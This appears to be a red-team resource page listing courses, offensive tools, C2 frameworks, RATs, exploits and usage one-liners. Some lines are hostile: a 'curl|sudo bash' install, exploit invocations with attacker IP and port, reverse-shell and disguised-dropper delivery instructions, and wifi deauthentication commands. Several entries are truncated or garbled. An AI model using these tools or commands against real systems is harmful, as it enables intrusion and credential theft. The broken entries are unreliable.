CARTPCertified Azure Red Teaming ProfessionalAttacking & Defending Azure Cloud: Beginner’s Edition (CARTP) (
Root meWelcome [Root Me : Hacking and Information Security learning platform] (
PentesterLabPentesterLab: Learn Web Penetration Testing: The Right WayPlatform
CRTS Red Team Specialist [CRTS] – CWL : Advanced Cyber Attack & Detection Learning Platform (
VX-Underground collection
Maldev AcademyMaldev AcademyCertification
Zero-Point SecurityRed Team Ops II, Red Team Ops I, C2 Development C#…Zero-Point Security (
Fucking the book of secret knowledge Correia-jpv/fucking-the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. With repository stars⭐ and forks🍴 ( collection
Red Team LabsOnline Red Team Labs | Altered SecurityCertification
HTB CPTSHTB Penetration Testing Certification [CPTS] | Hack The BoxCertification
Game Of Thrones Active DirectorySelf-hosted vulnerable AD lab. Orange-Cyberdefense/GOAD: game of active directory (
PentesteracademyAll Courses – Full Listing (
Breadev AcademyEvilNginx (Phishing course)
Rhino Security LabsRhinoSecurityLabs/cloudgoat: CloudGoat is Rhino Security Labs’ “Vulnerable by Design” AWS deployment tool (
Awesome EDR Bypass List of PoC, blogs, tools etctkmru/awesome-edr-bypass: Awesome EDR Bypass Resources For Ethical Hacking (
Awesome AV-EDR-XDR Bypass How to bypass different AV vendors MrEmpy/Awesome-AV-EDR-XDR-Bypass: Awesome AV/EDR/XDR Bypass Tips (
Binary OffensiveMgeeky. Initial Access Training binary-offensive | Offensive IT SecurityCourses
Sektor7Malware dev, windows evasion etcSEKTOR7 ResearchCourse
Hacktricks Learning and CertsCloud CertsHackTricks TrainingCourse/Certification
BallisKitInitial Access Training and toolBallisKitCourse/knowledge
Attacking and Defending Azure AD Cloud: Beginner’s EditionCloud CertAttacking & Defending Azure Cloud: Beginner’s Edition (CARTP) (
The Art Of Initial AccessThis course is for learning to create macro in VBA to gain inital accessMacroPioneer: The Art of Initial Access – Advanced Macro Techniques Series (

Unsorted tools

Name of the ToolLinkDescriptionCommand ExampleTool Category
JAWS – Just Another Windows (Enum) ScriptGitHub LinkJAWS is a Windows enumeration script.N/AEnumeration/Info Gathering
ProxyNotShell-PoCGitHub LinkProxyNotShell-PoC is a proof of concept tool.N/AExploitation
MSSQL Practical Injection Cheat Sheet – Perspective RiskLinkA practical cheat sheet for MSSQL injection.N/AWeb Application
Pycrypt (Pycrypt)GitHub LinkPycrypt is a tool related to cryptography in Python.N/AEncryption/Decryption
Cython: C-Extensions for PythonLinkCython is a tool for creating C-extensions for Python.N/ADevelopment Tools
ZoomEyeLinkZoomEye is a cyberspace mapping tool.N/AEnumeration/Info Gathering
ICMP Reverse Shell written in Python 3 (icmpdoor)GitHub Linkicmpdoor is an ICMP reverse shell written in Python 3.N/APost-Exploitation
ICMP reverse shell in Python 3 (Cryptsus Blog)LinkInformation on using an ICMP reverse shell in Python 3.N/APost-Exploitation
You got Domain Admin, now what?LinkAn article discussing actions to take after gaining Domain Admin access.N/APost-Exploitation
How to bypass sudo — exploit cve-2023–22809 vulnerabilityLinkA guide on bypassing sudo using a CVE-2023-22809 vulnerability.N/APrivilege Escalation
fireprox: AWS API Gateway management toolGitHub Linkfireprox is a tool for creating HTTP pass-through proxies for IP rotation using AWS API Gateway.N/AWeb Application
OfflineSAM/OfflineAddAdmin2GitHub LinkOfflineSAM/OfflineAddAdmin2 is a tool for adding admin accounts offline in Windows.N/APrivilege Escalation
Falcon SandboxLinkFalcon Sandbox is a malware analysis service.N/AMalware Analysis
Inveigh: .NET IPv4/IPv6 machine-in-the-middle toolGitHub LinkInveigh is a tool for intercepting traffic and performing man-in-the-middle attacks on IPv4/IPv6 networks.N/AExploitation
Pentesting CI/CD MethodologyLinkA methodology for penetration testing in CI/CD environments.N/APenetration Testing
Sn1per: Attack Surface Management PlatformGitHub LinkSn1per is an attack surface management platform.N/APenetration Testing
SignatureGate: Weaponized HellsGate/SigFlipGitHub LinkSignatureGate is a tool related to weaponized HellsGate/SigFlip.N/AExploitation
Synergy-httpx: Python HTTP server for red teaming activitiesGitHub LinkSynergy-httpx is a Python HTTP server designed for red teaming activities.N/AWeb Application
RosFuscator: C# source code obfuscation projectGitHub LinkRosFuscator is a project for obfuscating C# source code using Roslyn.N/AExploitation
HavocN/ANo link or description provided.N/AN/A
atomic-red-team: Detection tests based on MITRE’s ATT&CKGitHub Linkatomic-red-team provides detection tests based on MITRE’s ATT&CK framework.N/AEnumeration/Info Gathering
ChainBrain AI: Advanced Prompts for ChatGPTLinkChainBrain AI is a tool for providing advanced prompts to ChatGPT.N/AN/A
Villain: C2 framework for reverse shellsGitHub LinkVillain is a C2 framework for handling multiple TCP socket and HoaxShell-based reverse shells.N/AExploitation
Wormhole: Private file sharingLinkWormhole is a private file sharing tool.N/AN/A
PowershellKerberos: dumper.ps1GitHub LinkPowershellKerberos provides a dumper.ps1 script.N/AEnumeration/Info Gathering
pyFUD: Cross-platform remote access Trojan (RAT)GitHub LinkpyFUD is a cross-platform remote access Trojan (RAT).N/AMalware
Caido: Lightweight web security auditing toolkitN/ANo link provided.N/AN/A
OSINT IndustriesLinkOSINT Industries provides OSINT tools and resources.N/AEnumeration/Info Gathering
IPVoid: IP address and network toolsLinkIPVoid offers IP address and network tools.N/AEnumeration/Info Gathering
LOTS Project: Living Off Trusted SitesN/ANo link or description provided.N/AN/A
Penetration-Testing-Tools: Collection of tools and scriptsGitHub LinkA collection of tools, scripts, and cheatsheets for red teaming, penetration testing, and IT security audits.N/APenetration Testing
XSStrike: Advanced XSS scannerGitHub LinkXSStrike is an advanced XSS scanner.N/AWeb Application
PetitPotam: PoC tool for Windows authenticationGitHub LinkPetitPotam is a proof of concept tool to coerce Windows hosts to authenticate to other machines.N/AExploitation
Snaffler: Tool for finding candyGitHub LinkSnaffler is a tool for pentesters to find valuable information.N/AEnumeration/Info Gathering
LaZagne: Credentials recovery projectGitHub LinkLaZagne is a credentials recovery project.N/APassword Cracking
rdpwrap: RDP Wrapper LibraryGitHub Linkrdpwrap is an RDP Wrapper Library.N/APrivilege Escalation
iKAT: Interactive Kiosk Attack ToolLinkiKAT is an interactive kiosk attack tool.N/AExploitation
RdpThief: Extracting Clear Text Passwords from mstsc.exeGitHub LinkRdpThief extracts clear text passwords from mstsc.exe using API hooking.N/APassword Cracking
Snusbase: Database Search EngineLinkSnusbase is a database search engine.N/AEnumeration/Info Gathering
attacking-cloudgoat2: Walkthrough of CloudGoat 2.0 scenariosGitHub LinkA step-by-step walkthrough of CloudGoat 2.0 scenarios.N/APenetration Testing
ligolo-ng: Tunneling and pivoting toolGitHub Linkligolo-ng is a tunneling and pivoting tool that uses a TUN interface.N/AExploitation
PowerAL: PowerShell module for identifying AppLocker weaknessesGitHub LinkPowerAL is a PowerShell module for identifying AppLocker weaknesses.N/APrivilege Escalation
prettyRECONN/ANo link or description provided.N/AN/A
ExtractBitlockerKeys: Script to extract Bitlocker recovery keysGitHub LinkA script to automatically extract Bitlocker recovery keys from a domain.N/APost-Exploitation
Microsoft-Activation-Scripts: Windows and Office activatorGitHub LinkA Windows and Office activator using HWID / KMS38 / Online KMS activation methods, with a focus on open-source code and fewer antivirus detections.N/AExploitation
NetExec: The Network Execution ToolGitHub LinkNetExec is a network execution tool.N/AExploitation
naabu: Fast port scanner for attack surface discoveryGitHub Linknaabu is a fast port scanner designed for attack surface discovery in bug bounties and pentests.N/AEnumeration/Info Gathering
DavRelayUp: Local privilege escalation toolGitHub LinkDavRelayUp is a tool for local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced.N/APrivilege Escalation
AD_Miner: Active Directory audit toolGitHub LinkAD_Miner is an Active Directory audit tool that leverages Cypher queries to analyze data from the Bloodhound graph database and uncover security weaknesses.N/AEnumeration/Info Gathering
Perfusion: Exploit for RpcEptMapper registry key vulnerabilityGitHub LinkPerfusion is an exploit for the RpcEptMapper registry key permissions vulnerability in Windows.N/AExploitation
MSSqlPwner: Microsoft SQL Server exploitation toolGitHub LinkMSSqlPwner is a tool for exploiting Microsoft SQL Server.N/AExploitation
HeidiSQL: Database management toolLinkHeidiSQL is a database management tool for MariaDB, MySQL, MSSQL, PostgreSQL, and SQLite.N/ADatabase Management
Apollo 11 Guidance Computer (AGC) Source CodeGitHub LinkOriginal source code for the Apollo 11 Guidance Computer (AGC) used in the command and lunar modules.N/ASoftware Development LinkA website providing links to various files and resources.N/AEnumeration/Info Gathering
Top Pentest DevicesN/ANo link or description provided.N/AN/A
WolframAlpha: Computational IntelligenceLinkWolframAlpha is a computational intelligence engine that provides answers to a wide range of queries.
tomcatWarDeployer: Apache Tomcat auto WAR deployment toolGitHub LinktomcatWarDeployer is a tool for automatically deploying WAR files to Apache Tomcat servers during penetration testing.N/AExploitation
nmapAutomator: Background script for NmapGitHub LinknmapAutomator is a script designed to run Nmap in the background and automate the process of port scanning and service enumeration.N/AEnumeration/Info Gathering
kerbrute: Kerberos bruteforcing scriptGitHub Linkkerbrute is a script for performing Kerberos bruteforcing using Impacket library.N/APassword Cracking
kerbrute: Tool for Kerberos pre-auth bruteforcingGitHub Linkkerbrute is a tool for performing Kerberos pre-authentication bruteforcing.N/APassword Cracking
attacktive-directory-tools: Tools for Active DirectoryGitHub Linkattacktive-directory-tools is a collection of tools for Active Directory attacks and enumeration.N/AEnumeration/Info Gathering
pywerview: Python rewriting of PowerViewGitHub Linkpywerview is a Python rewrite of PowerSploit’s PowerView, a tool for Active Directory enumeration.N/AEnumeration/Info Gathering
evil-winrm: WinRM shell for hacking/pentestingGitHub Linkevil-winrm is a tool for interacting with Windows Remote Management (WinRM) for hacking and penetration testing.N/AExploitation
sqlmap: SQL injection and database takeover toolGitHub Linksqlmap is an automated SQL injection and database takeover tool.N/AWeb Application
crunch: Wordlist generatorGitHub Linkcrunch is a wordlist generator that allows you to specify a standard character set for generating password lists.N/APassword Cracking
wfuzz: Web application fuzzerGitHub Linkwfuzz is a web application fuzzer that helps in discovering vulnerabilities through automated testing.N/AWeb Application
OWASP CheatSheetSeries: Application security cheat sheetsGitHub LinkThe OWASP Cheat Sheet Series provides a collection of high-value information on specific application security topics.N/ASecurity Reference
ncsc-scanning-made-easy-script-developer-guidelines.mdGitHub LinkDeveloper guidelines for creating scanning scripts as part of the UK NCSC Scanning Made Easy project.N/ASecurity Guidelines
pspy: Linux process monitoring without root permissionsGitHub Linkpspy is a tool for monitoring Linux processes without requiring root permissions.N/AEnumeration/Info Gathering
Churrasco: Changes for Visual Studio 2013GitHub LinkChurrasco contains changes for Visual Studio 2013.N/ADevelopment Tools
MS10-059: Chimichurri Windows kernel exploitGitHub LinkMS10-059 is a Windows kernel exploit known as Chimichurri.N/AExploitation
CVE-2021-4034: 1-day vulnerabilityGitHub LinkCVE-2021-4034 is a one-day vulnerability.N/AExploitation
unicorn: PowerShell downgrade attack and shellcode injectorGitHub Linkunicorn is a tool for using a PowerShell downgrade attack and injecting shellcode into memory.N/AExploitation
dostackbufferoverflowgoodGitHub Linkdostackbufferoverflowgood is a resource for learning about stack buffer overflows.N/AExploitation
Obfuscated String/Shellcode Generator – Online ToolWebsite LinkAn online tool for generating obfuscated strings and shellcode.N/AExploitation
explodingcan: Implementation of NSA’s ExplodingCan exploitGitHub Linkexplodingcan is an implementation of NSA’s ExplodingCan exploit in Python.N/AExploitation
winPEAS: Privilege Escalation for WindowsGitHub LinkwinPEAS is a

Information Gathering/ Enumeration

NMAP – Network Mapper NSEDoc Reference Portal

Nmap Cheat Sheet

Usage and Examples | Nmap Network Scanning

Firewall/IDS Evasion and Spoofing | Nmap Network Scanning
Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses.nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output
Batea goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports. # Complete info
$ sudo nmap -A -oX output.xml

# Partial info
$ sudo nmap -O -sV -oX output.xml

$ batea -v output.xml
Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.# Extract any file that it finds
binwalk -e firmware.bin
Create phishing webistes to phish information.
Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet facing risks
Shodan Engine for the Internet of Everythingapache country:no port:80 http.status:200
Dig (Domain Information Groper) is a command line utility that performs DNS lookup by querying name servers and displaying the result to you.dig [server] [name] [type]
DNSdumpster is a FREE domain research tool that can discover hosts related to a domain. Search for domain.
Enum4Linux is a tool for enumerating information from Windows and Samba systemsenum4linux -a host
EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known../EyeWitness -f urls.txt --web
Insomnia API queries with GUISee website
Masscan is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.Scans the entire intenret
masscan -p0-65535
Maltego is a very powerful data mining tool that offers an endless combination of search tools and strategies
SIPvicious suite OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.See github for full documentation
Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files.$ steghide embed -cf picture.jpg -ef secret.txt
Enter passphrase:
Re-Enter passphrase:
embedding "secret.txt" in "picture.jpg"... done
ODAT – Oracle Database Attacking Tool (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.See github.
theHarvester tool gathers names, emails, IPs, subdomains, and URLstheharvester -d -b googlex
Social searcher Social Media Search Enginen/a
Sn1per hidden assets and vulnerabilities in your environmentSee github
gitleaksGitHub – gitleaks/gitleaks: Protect and discover secrets using Gitleaks 🔑Gitleaks is a SAST tool for detecting and preventing hardcoded secrets like passwords, api keys, and tokens in git repos. gitleaks detect --source . -v
AutoReconGitHub – Tib3rius/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.Automatic enumerationautorecon -t target


Repository for EternalBlue exploit.See repository.
Infectious Monkey Monkey is a free open-source, network penetration testing tool. It is a breach and attack simulator that uses real-world attack techniques and known vulnerabilities.
Metsploit vulnerabilites automatically. msfconsole
Windows-php-reverse-shell php reverse shell implemented using binary , based on an webshell .Usage : change the ip and port in the windows-php-reverse-shell.php file upload , set up an listener in you machine , access the windows-php-reverse-shell.php file on the server
SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. To get a list of basic options and switches use:
python -h
IIS 6.0 BOF – RCE – Buffer Overflow in the ScStoragePathFromUrl  function in webdavpython2 targetip targetport srcip srcport
Drupalgeddon2 core – Highly critical – Remote Code Execution – SA-CORE-2018-002ruby drupalgeddon2.rb TARGET
Windows Kernel Exploit List of Kernel exploitsSee github

Password Crackers

Hashcat is a password cracking tool. See CheatSheet
Hydra tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.See CheatSheet

Privilege Escalation

ToolLinkOS DescriptionCommand/Example
BeRoot Project BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.usage: beRoot.exe [-h] [-l]

Deepce Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)# Make the script executable and then run it
chmod +x ./

GTFObins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.See website.
LinEnum possible PrivEsc VectorsSee github
linPEAS possbile privesc vectors./
winPEAS possible privesc vectors winpeas.exe or winpeas.bat
linuxprivchecker possible privesc vectors
linux-exploit-suggester possible privesc vectors. Run locally./
windows-exploit-suggester List posbile privesc vectors. Run locally./ --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
PowerSploit\PowerUp.ps1 aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.See full potentional i github. To execute on target, see my cheatsheet.
PowerSploit\PowerView.ps1 is series of functions that performs network and Windows domain enumeration and exploitation.See full potentional i github. To execute on target, see my cheatsheet.
Juicy Potato and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on and when you have SeImpersonate or SeAssignPrimaryToken privileges.
MS10-059 Chimichurri in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799)chimichurri.exe attackerip attackerport
Polkit CVE-2021-4034’s pkexec, a SUID-root program that is installed by default on every major Linux distribution:python3 (run it on target to get root.


C2 – Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
C2 – PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.See github
C2 – Cobalt Strike Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network.
C2 – Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent
C2 – Starkiller (Empire frontend) is a Frontend for Powershell Empire./starkiller-<version>.AppImage --no-sandbox
C2 – Meterpreter PS1 starts a listener Server on a Windows|Linux attacker machine and generates oneliner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machineDeliver Dropper/Payload To Target Machine (apache2)
USE THE 'Attack Vector URL' TO DELIVER '' (dropper) TO TARGET .. UNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator)..
C2 – Alan Framework Framework is a post-exploitation framework useful during red-team activities.
C2 – Silver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing.Linux One Liner
curl|sudo bash 
and then run 

Armitage Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.$ chisel server --port $PORT --proxy
# listens on $PORT, proxy web requests to
sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via sshsshuttle [options] -r [username@]sshserver[:port] <subnets …>
lingolo-ng is a simplelightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).See github
C2 – HavocHavoc (

GitHub – HavocFramework/Havoc: The Havoc Framework.
Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

New C2 framework that can bypass Win 11 defender
See github
C2 – Brute ratel Brute Ratel C4 | Badger doesn’t care. It takes what it wants!A Customized Command and Control Center for Red Team and Adversary Simulation

Web Application

BurpSuite Suite is a framework of web appliccation pentesting tool. It is used to perform web app testing.
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects.dirb <url_base> <url_base> [<wordlist_file(s)>] [options]
Dirbpy is a new version of dirb but in python. This version is faster than the normal version in C because it uses thread. Dirbpy is a Web Content Scanner. It looks for hidden Web Objects.dirbpy -o -u https://[....].com
Dirhunter is a web crawler optimize for search and analyze directories.$ dirhunt
ffuf fast web fuzzer written in Go.ffuf -w /path/to/wordlist -u https://target/FUZZ
Feroxbuster is a tool designed to perform Forced Browsing../feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
Gobuster is a tool used to brute-force:
URIs (directories and files) in web sites.
DNS subdomains (with wildcard support).
Virtual Host names on target web servers.
Open Amazon S3 buckets
gobuster dir -u http:// -w wordlist
Fuxploider tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.python3 --url --not-regex "wrong file type"
FuzzDB the likelihood of finding application security vulnerabilities through dynamic application security testing.
Nikto is web server scannernikto -h <target>
Raccoon Security Tool for Reconnaissance and Information GatheringUsage: raccoon [OPTIONS] TARGET
Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT.To enumerate subdomains of specific domain:
python -d
Joomscan the task of vulnerability detection and reliability assurance in Joomla CMS [options]
Droopscan CMS are:
droopescan scan drupal -u -t 32
Crawleet Recon & Exploitaition Tool.python -u <URL>
wafw00f Bypass wafw00f http://target

Active Directory Environment

BloodHoundAD uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.
Impacket is a collection of Python classes for working with network protocols. NOT LIMITED TO AD ENVIRONMENT.
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENTSee github
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENTSee github

Malware Analysis(MA)/ Buffer Overflow(BOF)

MAGhidra software reverse engineering (SRE) suite of tools developed by NSA’s Research Directorate in support of the Cybersecurity mission
BOFPython GDB PEDA – Python Exploit Development Assistance for GDBSee Github

WiFi / Wireless

Aircrack-ng is a complete suite of tools to assess WiFi network security.

Monitoring: Packet capture and export of data to text files for further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)
#Deatuh attack
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

# Start airodump-ng to collect authentication handshake
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
BoopSuite is a set of tools written in Python designed for wireless auditing and security testing.BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {}
               [-m MAC]
Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework.